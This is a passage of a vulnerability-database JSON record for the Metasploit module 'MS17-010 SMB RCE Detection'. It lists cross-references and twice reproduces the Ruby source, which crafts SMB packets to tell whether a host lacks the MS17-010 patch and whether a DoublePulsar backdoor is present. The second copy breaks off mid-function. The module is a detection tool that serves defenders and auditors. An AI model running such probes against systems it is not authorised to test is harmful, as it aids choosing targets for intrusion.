"SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/BROWSER/MS08_053_MEDIAENCODER", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", 
"OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-04-12T00:02:58", "rev": 2, "value": 4.4, "vector": "NONE"}}, "hash": "7f41373b73b89844d795a75d968d4fd4", "history": [], "href": "", "id": "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "lastseen": "2020-04-12T00:02:58", "metasploitHistory": "", "metasploitReliability": "", "modified": "2019-05-23T19:19:33", "objectVersion": "1.4", "published": "2017-03-29T22:24:59", "references": ["https://technet.microsoft.com/en-us/library/security/ms17-010.aspx", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://github.com/countercept/doublepulsar-detection-script", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: 
https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Exploit::Remote::SMB::Client::Authenticated\n include Msf::Exploit::Remote::SMB::Client::PipeAuditor\n\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 SMB RCE Detection',\n 'Description' => %q{\n Uses information disclosure to determine if MS17-010 has been patched or not.\n Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0.\n If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does\n not have the MS17-010 patch.\n\n If the machine is missing the MS17-010 patch, the module will check for an\n existing DoublePulsar (ring 0 shellcode/malware) infection.\n\n This module does not require valid SMB credentials in default server\n configurations. It can log on as the user \"\\\" and connect to IPC$.\n },\n 'Author' =>\n [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0\n 'Luke Jennings' # DoublePulsar detection Python code\n ],\n 'References' =>\n [\n [ 'CVE', '2017-0143'],\n [ 'CVE', '2017-0144'],\n [ 'CVE', '2017-0145'],\n [ 'CVE', '2017-0146'],\n [ 'CVE', '2017-0147'],\n [ 'CVE', '2017-0148'],\n [ 'MSB', 'MS17-010'],\n [ 'URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n [ 'URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n [ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx']\n ],\n 'License' => MSF_LICENSE,\n 'Notes' =>\n {\n 'AKA' => [\n 'DOUBLEPULSAR',\n 'ETERNALBLUE'\n ]\n }\n ))\n\n register_options(\n [\n OptBool.new('CHECK_DOPU', [false, 'Check for DOUBLEPULSAR on vulnerable hosts', true]),\n OptBool.new('CHECK_ARCH', [false, 'Check for architecture on vulnerable hosts', true]),\n OptBool.new('CHECK_PIPE', [false, 'Check for 
named pipe on vulnerable hosts', false])\n ])\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? 'x86 (32-bit)' : 'x64 (64-bit)'\n end\n\n def run_host(ip)\n checkcode = Exploit::CheckCode::Unknown\n\n begin\n ipc_share = \"\\\\\\\\#{ip}\\\\IPC$\"\n\n tree_id = do_smb_setup_tree(ipc_share)\n vprint_status(\"Connected to #{ipc_share} with TID = #{tree_id}\")\n\n status = do_smb_ms17_010_probe(tree_id)\n vprint_status(\"Received #{status} with FID = 0\")\n\n if status == \"STATUS_INSUFF_SERVER_RESOURCES\"\n os = simple.client.peer_native_os\n\n if datastore['CHECK_ARCH']\n case dcerpc_getarch\n when ARCH_X86\n os << ' x86 (32-bit)'\n when ARCH_X64\n os << ' x64 (64-bit)'\n end\n end\n\n print_good(\"Host is likely VULNERABLE to MS17-010! - #{os}\")\n\n checkcode = Exploit::CheckCode::Vulnerable\n\n report_vuln(\n host: ip,\n port: rport, # A service is necessary for the analyze command\n name: self.name,\n refs: self.references,\n info: \"STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$ - #{os}\"\n )\n\n # vulnerable to MS17-010, check for DoublePulsar infection\n if datastore['CHECK_DOPU']\n code, signature1, signature2 = do_smb_doublepulsar_probe(tree_id)\n\n if code == 0x51\n xor_key = calculate_doublepulsar_xor_key(signature1).to_s(16).upcase\n arch = calculate_doublepulsar_arch(signature2)\n print_warning(\"Host is likely INFECTED with DoublePulsar! 
- Arch: #{arch}, XOR Key: 0x#{xor_key}\")\n report_vuln(\n host: ip,\n name: \"MS17-010 DoublePulsar Infection\",\n refs: self.references,\n info: \"MultiPlexID += 0x10 on Trans2 request - Arch: #{arch}, XOR Key: 0x#{xor_key}\"\n )\n end\n end\n\n if datastore['CHECK_PIPE']\n pipe_name, _ = check_named_pipes(return_first: true)\n\n return unless pipe_name\n\n print_good(\"Named pipe found: #{pipe_name}\")\n\n report_note(\n host: ip,\n port: rport,\n proto: 'tcp',\n sname: 'smb',\n type: 'MS17-010 Named Pipe',\n data: pipe_name\n )\n end\n elsif status == \"STATUS_ACCESS_DENIED\" or status == \"STATUS_INVALID_HANDLE\"\n # STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others)\n print_error(\"Host does NOT appear vulnerable.\")\n else\n print_error(\"Unable to properly detect if host is vulnerable.\")\n end\n\n rescue ::Interrupt\n print_status(\"Exiting on interrupt.\")\n raise $!\n rescue ::Rex::Proto::SMB::Exceptions::LoginError\n print_error(\"An SMB Login Error occurred while connecting to the IPC$ tree.\")\n rescue ::Exception => e\n vprint_error(\"#{e.class}: #{e.message}\")\n ensure\n disconnect\n end\n\n checkcode\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n return simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_probe(tree_id)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(tree_id)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def do_smb_ms17_010_probe(tree_id)\n # request transaction with fid = 0\n pkt = make_smb_trans_ms17_010(tree_id)\n sock.put(pkt)\n bytes = 
sock.get_once\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n # convert error code to string\n code = pkt['SMB'].v['ErrorClass']\n smberr = Rex::Proto::SMB::Exceptions::ErrorCode.new\n\n return smberr.get_error(code)\n end\n\n def make_smb_trans2_doublepulsar(tree_id)\n # make a raw transaction packet\n # this one is a trans2 packet, the checker is trans\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n # opcode 0x0e = SESSION_SETUP\n setup = \"\\x0e\\x00\\x00\\x00\"\n setup_count = 1 # 1 word\n trans = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n # calculate offsets to the SetupData payload\n base_offset = pkt.to_s.length + (setup.length) - 4\n param_offset = base_offset + trans.length\n data_offset = param_offset # + 0\n\n # packet baselines\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['MultiplexID'] = 65\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n pkt['Payload']['SMB'].v['TreeID'] = tree_id\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload'].v['Timeout'] = 0x00a4d9a6\n pkt['Payload'].v['ParamCountTotal'] = 12\n pkt['Payload'].v['ParamCount'] = 12\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamOffset'] = 66\n pkt['Payload'].v['DataOffset'] = 78\n\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup\n pkt['Payload'].v['Payload'] = trans\n\n pkt.to_s\n end\n\n def make_smb_trans_ms17_010(tree_id)\n # make a raw transaction packet\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n # opcode 0x23 = PeekNamedPipe, fid = 0\n setup = \"\\x23\\x00\\x00\\x00\"\n setup_count = 2 # 2 words\n trans = 
\"\\\\PIPE\\\\\\x00\"\n\n # calculate offsets to the SetupData payload\n base_offset = pkt.to_s.length + (setup.length) - 4\n param_offset = base_offset + trans.length\n data_offset = param_offset # + 0\n\n # packet baselines\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0x2801 # 0xc803 would unicode\n pkt['Payload']['SMB'].v['TreeID'] = tree_id\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload'].v['ParamCountMax'] = 0xffff\n pkt['Payload'].v['DataCountMax'] = 0xffff\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataOffset'] = data_offset\n\n # actual magic: PeekNamedPipe FID=0, \\PIPE\\\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup\n pkt['Payload'].v['Payload'] = trans\n\n pkt.to_s\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/smb/smb_ms17_010.rb", "title": "MS17-010 SMB RCE Detection", "type": "metasploit", "viewCount": 3929}, "differentElements": ["modified", "sourceData"], "edition": 53, "lastseen": "2020-04-12T00:02:58"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "Uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does not have the MS17-010 patch. If the machine is missing the MS17-010 patch, the module will check for an existing DoublePulsar (ring 0 shellcode/malware) infection. This module does not require valid SMB credentials in default server configurations. 
It can log on as the user \"\\\" and connect to IPC$.\n", "enchantments": {"dependencies": {"modified": "2019-06-07T18:41:17", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["SSV:92952", "SSV:92964"], "type": 
"seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/BROWSER/SIEMENS_SOLID_EDGE_SELISTCTRLX", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"], "type": "securelist"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["EDB-ID:41987", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", 
"SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-06-07T18:41:17", "value": 4.4, "vector": "NONE"}}, "hash": "7f41373b73b89844d795a75d968d4fd4", "history": [], "href": "", "id": "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "lastseen": "2019-06-07T18:41:17", "metasploitHistory": "", "metasploitReliability": "", "modified": "2019-05-23T19:19:33", "objectVersion": "1.4", "published": "2017-03-29T22:24:59", "references": ["https://technet.microsoft.com/en-us/library/security/ms17-010.aspx", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://github.com/countercept/doublepulsar-detection-script", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Exploit::Remote::SMB::Client::Authenticated\n include Msf::Exploit::Remote::SMB::Client::PipeAuditor\n\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 SMB RCE Detection',\n 'Description' => %q{\n Uses 
information disclosure to determine if MS17-010 has been patched or not.\n Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0.\n If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does\n not have the MS17-010 patch.\n\n If the machine is missing the MS17-010 patch, the module will check for an\n existing DoublePulsar (ring 0 shellcode/malware) infection.\n\n This module does not require valid SMB credentials in default server\n configurations. It can log on as the user \"\\\" and connect to IPC$.\n },\n 'Author' =>\n [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0\n 'Luke Jennings' # DoublePulsar detection Python code\n ],\n 'References' =>\n [\n [ 'CVE', '2017-0143'],\n [ 'CVE', '2017-0144'],\n [ 'CVE', '2017-0145'],\n [ 'CVE', '2017-0146'],\n [ 'CVE', '2017-0147'],\n [ 'CVE', '2017-0148'],\n [ 'MSB', 'MS17-010'],\n [ 'URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n [ 'URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n [ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx']\n ],\n 'License' => MSF_LICENSE,\n 'Notes' =>\n {\n 'AKA' => [\n 'DOUBLEPULSAR',\n 'ETERNALBLUE'\n ]\n }\n ))\n\n register_options(\n [\n OptBool.new('CHECK_DOPU', [false, 'Check for DOUBLEPULSAR on vulnerable hosts', true]),\n OptBool.new('CHECK_ARCH', [false, 'Check for architecture on vulnerable hosts', true]),\n OptBool.new('CHECK_PIPE', [false, 'Check for named pipe on vulnerable hosts', false])\n ])\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? 
'x86 (32-bit)' : 'x64 (64-bit)'\n end\n\n def run_host(ip)\n checkcode = Exploit::CheckCode::Unknown\n\n begin\n ipc_share = \"\\\\\\\\#{ip}\\\\IPC$\"\n\n tree_id = do_smb_setup_tree(ipc_share)\n vprint_status(\"Connected to #{ipc_share} with TID = #{tree_id}\")\n\n status = do_smb_ms17_010_probe(tree_id)\n vprint_status(\"Received #{status} with FID = 0\")\n\n if status == \"STATUS_INSUFF_SERVER_RESOURCES\"\n os = simple.client.peer_native_os\n\n if datastore['CHECK_ARCH']\n case dcerpc_getarch\n when ARCH_X86\n os << ' x86 (32-bit)'\n when ARCH_X64\n os << ' x64 (64-bit)'\n end\n end\n\n print_good(\"Host is likely VULNERABLE to MS17-010! - #{os}\")\n\n checkcode = Exploit::CheckCode::Vulnerable\n\n report_vuln(\n host: ip,\n port: rport, # A service is necessary for the analyze command\n name: self.name,\n refs: self.references,\n info: \"STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$ - #{os}\"\n )\n\n # vulnerable to MS17-010, check for DoublePulsar infection\n if datastore['CHECK_DOPU']\n code, signature1, signature2 = do_smb_doublepulsar_probe(tree_id)\n\n if code == 0x51\n xor_key = calculate_doublepulsar_xor_key(signature1).to_s(16).upcase\n arch = calculate_doublepulsar_arch(signature2)\n print_warning(\"Host is likely INFECTED with DoublePulsar! 
- Arch: #{arch}, XOR Key: 0x#{xor_key}\")\n report_vuln(\n host: ip,\n name: \"MS17-010 DoublePulsar Infection\",\n refs: self.references,\n info: \"MultiPlexID += 0x10 on Trans2 request - Arch: #{arch}, XOR Key: 0x#{xor_key}\"\n )\n end\n end\n\n if datastore['CHECK_PIPE']\n pipe_name, _ = check_named_pipes(return_first: true)\n\n return unless pipe_name\n\n print_good(\"Named pipe found: #{pipe_name}\")\n\n report_note(\n host: ip,\n port: rport,\n proto: 'tcp',\n sname: 'smb',\n type: 'MS17-010 Named Pipe',\n data: pipe_name\n )\n end\n elsif status == \"STATUS_ACCESS_DENIED\" or status == \"STATUS_INVALID_HANDLE\"\n # STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others)\n print_error(\"Host does NOT appear vulnerable.\")\n else\n print_error(\"Unable to properly detect if host is vulnerable.\")\n end\n\n rescue ::Interrupt\n print_status(\"Exiting on interrupt.\")\n raise $!\n rescue ::Rex::Proto::SMB::Exceptions::LoginError\n print_error(\"An SMB Login Error occurred while connecting to the IPC$ tree.\")\n rescue ::Exception => e\n vprint_error(\"#{e.class}: #{e.message}\")\n ensure\n disconnect\n end\n\n checkcode\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n return simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_probe(tree_id)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(tree_id)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def do_smb_ms17_010_probe(tree_id)\n # request transaction with fid = 0\n pkt = make_smb_trans_ms17_010(tree_id)\n sock.put(pkt)\n bytes = 
sock.get_once\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n # convert error code to string\n code = pkt['SMB'].v['ErrorClass']\n smberr = Rex::Proto::SMB::Exceptions::ErrorCode.new\n\n return smberr.get_error(code)\n end\n\n def make_smb_trans2_doublepulsar(tree_id)\n # make a raw transaction packet\n # this one is a trans2 packet, the checker is trans\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n # opcode 0x0e = SESSION_SETUP\n setup = \"\\x0e\\x00\\x00\\x00\"\n setup_count = 1 # 1 word\n trans = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n # calculate offsets to the SetupData payload\n base_offset = pkt.to_s.length + (setup.length) - 4\n param_offset = base_offset + trans.length\n data_offset = param_offset # + 0\n\n # packet baselines\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['MultiplexID'] = 65\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n pkt['Payload']['SMB'].v['TreeID'] = tree_id\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload'].v['Timeout'] = 0x00a4d9a6\n pkt['Payload'].v['ParamCountTotal'] = 12\n pkt['Payload'].v['ParamCount'] = 12\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamOffset'] = 66\n pkt['Payload'].v['DataOffset'] = 78\n\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup\n pkt['Payload'].v['Payload'] = trans\n\n pkt.to_s\n end\n\n def make_smb_trans_ms17_010(tree_id)\n # make a raw transaction packet\n pkt = 